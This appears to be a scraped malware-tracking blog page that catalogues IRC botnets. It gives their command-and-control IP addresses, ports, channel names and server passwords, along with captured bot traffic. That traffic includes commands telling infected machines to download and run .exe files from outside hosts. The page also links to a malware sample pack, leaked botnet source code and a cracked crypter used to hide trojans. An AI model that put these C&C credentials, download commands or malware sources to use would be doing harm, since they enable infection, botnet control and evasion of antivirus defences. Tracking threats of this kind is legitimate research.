Remote Host Port Number 109.68.190.217 80 199.15.234.7 80 80.79.112.66 5749 PASS axplm2 NICK n{US|XPa}psbmdzo USER psbmdzo 0 0 :psbmdzo JOIN #chat Amx4k PRIVMSG win7elite :[d=”http://109.68.190.217/alms22.exe” s=”150528 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 exe file: Download Download hosting infos: http://whois.domaintools.com/80.79.112.66
67Mb Malware Samples
This package have alot of irc bot and banking trojans samples inside have fun exploring samples Download Download
Virus.Win32.Nimnul.a( Malware hosted in United States Network Operations Center Inc)
Hosted in USA also called Ramnit by other antiviruses what this malware does: Capability to send out email message(s) with the built-in SMTP client engine. Produces outbound traffic. Communication with a remote SMTP server and sending out email. Downloads/requests other files from Internet. Compromises SafeBoot registry key(s) in an attempt to disable the Safe Mode.Read more...
87.76.29.62(irc botnet hosted in United Kingdom Future Hosting Llc)
Remote Host Port Number 199.15.234.7 80 87.76.29.62 4443 NICK New{US-XP-x86}3443373 USER 3443373 “” “3443373” :3443373 MODE New{US-XP-x86}3443373 +iMm JOIN #new PONG 422 hosting infos: http://whois.domaintools.com/87.76.29.62
119.59.99.160(irc botnet hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)
Remote Host Port Number 119.59.99.160 2345 NICK New[USA|00|P|98932] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-6625 * 0 :COMPUTERNAME MODE New[USA|00|P|98932] -ix JOIN #!loco! PONG 22 MOTD Now talking in #!loco! Topic On: [ #!loco! ] [ .m.s|.m.e Foto http://goo.gl/JfWS5?= ] Topic By: [ wd11 ] hostingRead more...
timununyeri.co.cc(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
timununyeri.co.cc 94.102.0.65 Opened listening TCP connection on port: 113 C&C Server: 94.102.0.65:6667 Server Password: Username: arpsc Nickname: DEU|43304 Channel: #hack (Password: timu) Channeltopic: : Now talking in #hack Topic On: [ #hack ] [ .dl http://www.osmarimoveis-rs.com.br/ex.exe c:/ex.exe 1 ] Topic By: [ infeCTeD ] hosting infos: http://whois.domaintools.com/94.102.0.65
174.140.165.107(irc botnet hosted in United States Portland Directspace Networks Llc)
Remote Host Port Number 174.140.165.107 6667 PASS mystic NICK New{US-XP-x86}4733047 USER 4733047 “” “4733047” :4733047 MODE New{US-XP-x86}4733047 +iMm JOIN #Boss PONG :Mystical.gov hosting infos: http://whois.domaintools.com/174.140.165.107
vOlk HTTP Botnet – [+]Pharming ★ [ver 4.0] (VB Source)
Another HTTP malware (currently for sell in heckers board) Source leaked to public (have to say is very bad and VB language so u have to be a real hecker to spend 35$ for this garbage) Source may be in handy to AV Companies lol Download it here
proxysafe.mrkva.su(irc botnet hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)
This is another reptile mod wich spreads better then ngrBot wich is more famous because being for sell around proxysafe.mrkva.su 212.7.214.43 C&C Server: 212.7.214.43:2345 Server Password: Username: x Nickname: n[DEU|XP]7480782 Channel: #!proxy! (Password: ) Channeltopic: exe file for analysis: Download Download1 Download2 hosting infos: http://whois.domaintools.com/212.7.214.43
ColdSeal 5.4.1 Ultimate Release–FWB++ CRACKED
About the “coder” About ColdSeal Cryptor ColdSeal Cryptor this guy claim to be computer engineer …lol The tool is used mainly to protect malwares like RAT’s,Bots,Trojans alot of hf hecker’s are buying this and this “coder” is making alot of money from this dirty busines Price: Pay to Account U2903909 (ToXiiC) via LR Amount $70.00Read more...